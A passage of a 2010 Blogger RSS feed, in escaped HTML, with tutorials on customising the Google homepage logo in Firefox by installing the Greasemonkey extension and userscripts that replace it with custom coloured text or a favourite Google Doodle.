Arial,Helvetica,sans-serif;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;/span&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;1. First, you need to install the &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;https://addons.mozilla.org/en-US/firefox/addon/748&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;GreaseMonkey
 Addon&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;GreaseMonkey firefox add-on&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;a href=&quot;https://addons.mozilla.org/en-US/firefox/addon/748&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;GreaseMonkey
 Addon&quot;&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;2. Next, &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;http://userscripts.org/scripts/source/9540.user.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;Install this script&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;install the required script&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Once finished,&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;3. Go for &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Google&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;com&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;4.&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;Double clicks the Google Logo&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; and a box will appear  similar to &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;the figure below.&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Times New Roman&#39;;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj69HKMSPTbQV_1vBocM2Okluemk4B47aXM_eJSU3eJQWPY0bvIBfW5PK9Pm7i4KZLX669Wax_62-HfGVL-fElaegyxJZmt6_iQZ9L4neGANwDPYZoOKnLNasjs3TMOIvQqPE5d15Q0Kqc/s1600/sjhjka.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj69HKMSPTbQV_1vBocM2Okluemk4B47aXM_eJSU3eJQWPY0bvIBfW5PK9Pm7i4KZLX669Wax_62-HfGVL-fElaegyxJZmt6_iQZ9L4neGANwDPYZoOKnLNasjs3TMOIvQqPE5d15Q0Kqc/s1600/sjhjka.png&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: small;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Now, you can &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;type your own text&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; ( letters and space  ) and assign different &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;color&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; for each letter.&lt;/span&gt;&lt;/li&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;In color edit box, type the numbers: &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;1 – blue, 2 – red, 3 –  yellow, 4 – green or other – random&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;.&lt;/span&gt;&lt;/li&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;li style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Click the “&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Change&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;” button when finished and you  will noticed the new Google Logo Text.&amp;nbsp;&lt;/span&gt;&lt;/li&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Change the Google Doodle with your favourite one:-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;br /&gt;
&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;In the above section, I have shown you on how to R&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: black;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;eplace the Google text logo with any names you like&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;. Well, the trick is pretty old now. So, it’s time to learn a new trick. This time you will learn on how to &lt;b&gt;R&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;eplace the logo on Google homepage with your favourite Google Doodle&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;I believe everyone is familiar with the&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: magenta;&quot;&gt;&lt;b&gt;Google Doodle&lt;/b&gt;&lt;/span&gt; (also known as the&lt;b&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;color: magenta;&quot;&gt;G&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: magenta;&quot;&gt;oogle H&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: magenta;&quot;&gt;oliday Logo&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;). Our big brother Google has been dressing up its logo for festive occasions since 1998. The first Google Doodle was the Burning Man Festival of 1998.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span id=&quot;more-1964&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Favorite Doodle&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;is a&amp;nbsp;new Greasemonkey script that allows you to&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Replace the&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;text-decoration: line-through;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;boring&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;logo on the Google homepage and search results page with your favourite Google Doodle&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;. Since we are going to use a Greasemonkey script, this method is applicable to Firefox only.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;First, install the&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;https://addons.mozilla.org/firefox/addon/748&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;Greasemonkey Firefox Extension&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Greasemonkey&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;extension on your Firefox browser if you don’t already have. Restart your browser after the installation. Then, install the&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/gmsearchscripts/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;Favorite Doodle Greasemonkey Script&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Favorite Doodle&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;script.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Now, go to Google.com. If the Google logo has changed to Google Lego logo, it’s mean that the script is working fine.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Next, pick the Doodle that you like from the official&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.google.com/logos/index.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;Google Doodle Gallery&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Google Doodle Gallery&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;. I hope you don’t have hard time to pick one as your favourite Doodle. I know, most of the Doodles, if not all, are simply great.&amp;nbsp;&lt;img alt=&quot;:-)&quot; class=&quot;wp-smiley&quot; src=&quot;http://mytechquest.com/blog/wp-includes/images/smilies/icon_smile.gif&quot; style=&quot;cursor: move;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAFNm-wqprTvB9t0Nf68Lom5sKp2bxuA4fPhpzKN9AHcmsDgGoXXj8BLm7u0_WI-mvslpxL0CanKf0EWHg4ygq1hmkV7yUJ7fhmld1AdSgG6sGQLGxD64TqjzpGEk6cMKlht_HKtAsJMo/s1600/12.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAFNm-wqprTvB9t0Nf68Lom5sKp2bxuA4fPhpzKN9AHcmsDgGoXXj8BLm7u0_WI-mvslpxL0CanKf0EWHg4ygq1hmkV7yUJ7fhmld1AdSgG6sGQLGxD64TqjzpGEk6cMKlht_HKtAsJMo/s320/12.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisLK_y2fZzUOp1nYNNvspkedCwWM6a_sJtvrx1UstmXcIgx-fxsZu_kxBpZcWjmxXJGjuqkBDZ-A58XJqooNdESQz59tQdabFxs0P-lRcUErJfm_ZMY7kTkyQyxTOA9Mn5B1qEOuaIGiM/s1600/11.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;133&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisLK_y2fZzUOp1nYNNvspkedCwWM6a_sJtvrx1UstmXcIgx-fxsZu_kxBpZcWjmxXJGjuqkBDZ-A58XJqooNdESQz59tQdabFxs0P-lRcUErJfm_ZMY7kTkyQyxTOA9Mn5B1qEOuaIGiM/s320/11.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEvlYceknwXdSUswaIUP7tFJUvlXUhYgTOqiGxRSYGAiLQuc6TRvUA2Ln8aWgviijT8fvIAoEEIkk5OV8hkvpunYQqLl2HoASvmZ3wLXX8YoDUDSqNHaU6jGBcOtOQDY5AvAeMe3pZN7Y/s1600/Replace-Google-Logo-With-Google-Doodle-Holiday-Logo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;112&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEvlYceknwXdSUswaIUP7tFJUvlXUhYgTOqiGxRSYGAiLQuc6TRvUA2Ln8aWgviijT8fvIAoEEIkk5OV8hkvpunYQqLl2HoASvmZ3wLXX8YoDUDSqNHaU6jGBcOtOQDY5AvAeMe3pZN7Y/s320/Replace-Google-Logo-With-Google-Doodle-Holiday-Logo.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Once you have made a choice, simply click on the&amp;nbsp;”&lt;b&gt;&lt;i&gt;Make This My Favorite Doodle&lt;/i&gt;&lt;/b&gt;” button under your favourite Google Doodle to make the Google Doodle permanent on the Google homepage.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;So, will you still see new logos on holidays? Don’t worry, you wouldn’t miss any single new doodle on Google homepage. Whenever a new Google Doodle is shown, your favourite doodle will be replaced by the new doodle for that particular day. After the holiday, your favourite doodle will be displayed again.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;However, if you want, you can disable new Google Doodle from showing. Simply&amp;nbsp;select “Favorite Doodle -&amp;gt; Always show my favorite doodle, even on holidays” option from the Greasemonkey “User Script Commands” menu.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;img alt=&quot;Disable New Google Doodle from Showing&quot; class=&quot;alignnone size-full wp-image-1968&quot; height=&quot;146&quot; src=&quot;http://mytechquest.com/blog/wp-content/uploads/2009/10/Disable-New-Google-Doodle-From-Showing.jpg&quot; title=&quot;Disable New 
Google Doodle from Showing&quot; width=&quot;460&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;So this was all about the Googling in my own way. Next trick will be published soon over Google tweaking.&lt;/span&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2010/12/change-google-logo-text-to-your-name.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbBdlN6ogvedoQVmuFj49KgjucFG2keLjHv5LKccolGsPYpoOfJvhMB3tQIUIN3qF3ZLc_aGdqOHKX9SB_UUPH4hRyl0wWH5jdvcEt-et9RgdFDP4nIzyumHJJlfHvH3Vnsi6932Jn7ws/s72-c/Screenshot-1.png" height="72" width="72"/><thr:total>7</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-5783393468009930761</guid><pubDate>Thu, 09 Dec 2010 03:41:00 +0000</pubDate><atom:updated>2011-02-24T03:37:30.051-08:00</atom:updated><title>Change Google Doodle as your Name with Different Styles-</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;More than a year ago, I have shown you on how to &lt;a href=&quot;http://mytechquest.com/internet/how-to-change-google-logo-text-to-your-own-text/&quot; target=&quot;_blank&quot; title=&quot;How to 
Change Google Text logo to Your Own Text?&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;replace the Google text logo with any names you  like&lt;/span&gt;&lt;/a&gt;. Well, the trick is pretty old now. So, it’s time to  learn a new trick. This time you will learn on how to &lt;strong&gt;replace  the logo on Google homepage with your favourite Google Doodle&lt;/strong&gt;.&lt;br /&gt;
I believe everyone is familiar with the&amp;nbsp;Google Doodle (also known as  the &lt;strong&gt;Google Holiday Logo&lt;/strong&gt;). Our big brother Google has  been dressing up its logo for festive occasions since 1998. The first  Google Doodle was the Burning Man Festival of 1998.&lt;br /&gt;
&lt;span id=&quot;more-1964&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;strong&gt;Favorite Doodle&lt;/strong&gt; is a&amp;nbsp;new Greasemonkey script that  allows you to &lt;strong&gt;replace the &lt;/strong&gt;&lt;span style=&quot;text-decoration: line-through;&quot;&gt;&lt;strong&gt;boring&lt;/strong&gt;&lt;/span&gt;&lt;strong&gt; logo on the  Google homepage and search results page with your favourite Google  Doodle&lt;/strong&gt;. Since we are going to use a Greasemonkey script, this  method is applicable to Firefox only.&lt;br /&gt;
First, install the &lt;a href=&quot;https://addons.mozilla.org/firefox/addon/748&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;Greasemonkey Firefox Extension&quot;&gt;Greasemonkey&lt;/a&gt; extension on your Firefox browser if  you don’t already have. Restart your browser after the installation.  Then, install the &lt;a href=&quot;http://code.google.com/p/gmsearchscripts/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;Favorite Doodle Greasemonkey Script&quot;&gt;Favorite Doodle&lt;/a&gt; script.&lt;br /&gt;
Now, go to Google.com. If the Google logo has changed to Google Lego  logo, it’s mean that the script is working fine.&lt;br /&gt;
&lt;img alt=&quot;Replace Google Logo with Google Doodle Holiday Logo&quot; class=&quot;alignnone size-full wp-image-1966&quot; height=&quot;201&quot; src=&quot;http://mytechquest.com/blog/wp-content/uploads/2009/10/Replace-Google-Logo-With-Google-Doodle-Holiday-Logo.jpg&quot; title=&quot;Replace Google 
Logo with Google Doodle Holiday Logo&quot; width=&quot;460&quot; /&gt;&lt;br /&gt;
Next, pick the Doodle that you like from the official &lt;a href=&quot;http://www.google.com/logos/index.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot; title=&quot;Google Doodle Gallery&quot;&gt;Google  Doodle Gallery&lt;/a&gt;. I hope you don’t have hard time to pick one as your  favourite Doodle. I know, most of the Doodles, if not all, are simply  great. &lt;img alt=&quot;:-)&quot; class=&quot;wp-smiley&quot; src=&quot;http://mytechquest.com/blog/wp-includes/images/smilies/icon_smile.gif&quot; /&gt; &lt;br /&gt;
&lt;img alt=&quot;Choose Favourite Google Doodle from Google Doodle Gallery&quot; class=&quot;alignnone size-full wp-image-1967&quot; height=&quot;422&quot; src=&quot;http://mytechquest.com/blog/wp-content/uploads/2009/10/Choose-Favourite-Google-Doodle-Holiday-Logo.jpg&quot; title=&quot;Choose 
